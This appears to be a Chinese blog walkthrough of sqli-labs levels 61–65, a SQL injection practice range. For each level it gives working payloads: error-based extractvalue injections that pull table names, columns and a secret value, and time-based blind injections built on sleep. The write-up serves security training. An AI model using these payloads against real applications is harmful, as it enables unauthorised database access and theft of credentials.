码迷,mamicode.com
首页 > 数据库 > 详细

sql-lib闯关秘籍之61-65关

时间:2020-01-28 20:55:21      阅读:78      评论:0      收藏:0      [点我收藏+]

标签:cat   靶场   schema   img   ascii   logs   span   tle   用户密码   

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关sql-lib闯关秘籍之11-20关sql-lib闯关秘籍之21-30关, sql-lib闯关秘籍之31-40关 ,sql-lib闯关秘籍之41-50关sql-lib闯关秘籍之51-60关

不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!

以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~

 马上就要结束了,亲爱的,兴奋吗!!!!!!!!

第六十一关

和六十关基本一样,就是变成了单引号和双括号,这好像是第一次遇见双括号

爆数据库名   ?id=1‘))and extractvalue(1, concat(0x5c, (select database())))%23

技术图片

 爆表名    ?id=0‘)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘),0x7e))--+

技术图片

  爆列名       ?id=-1‘)) union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘e01xkjlffi‘),0x7e))--+

技术图片

 爆数据      ?id=-1‘)) union select extractvalue(1,concat(0x7e,(select group_concat(secret_SUO9) from e01xkjlffi),0x7e))--+

 技术图片

 搞定了!   x9UWIAkqAsbxXsjEsFOU9bH5

技术图片

 

 第六十二关

这关这次联合注入和报错注入都不可以了 ,那我们呢用盲注

?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(3))--+

技术图片

 

 当然,我看见这关还有过脚本的,我不是特别明白,明白了我再补充

 第六十三关

和六十二关基本一样,唯一区别在于需要使用单引号闭合

?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时间短,错误时间长

技术图片

第六十四关

和六十二关基本一样,唯一区别在于需要使用括号闭合

?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时间短,错误时间长

技术图片

 

 

第六十五关

和六十二关基本一样,同上,只不过?id=1”) 正确延时

 ?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+
 技术图片

 

 

哦哦哦哦哦哦哦哦哦!!!!!!!~~~~~结束啦!!!!

有任何问题都可以给我留言哈,嘿嘿   @-@

61-65关结束

 

 

该文章有参考了以下的网页:

 

SQL注入靶场sqli-labs 1-65关全部通关教程

SQLi_Labs通关文档【1-65关】

 sqli-labs 1-65教程

 [sqli-labs]Less-62(Bool盲注)

 

sql-lib闯关秘籍之61-65关

标签:cat   靶场   schema   img   ascii   logs   span   tle   用户密码   

原文地址:https://www.cnblogs.com/longshisan/p/12238648.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!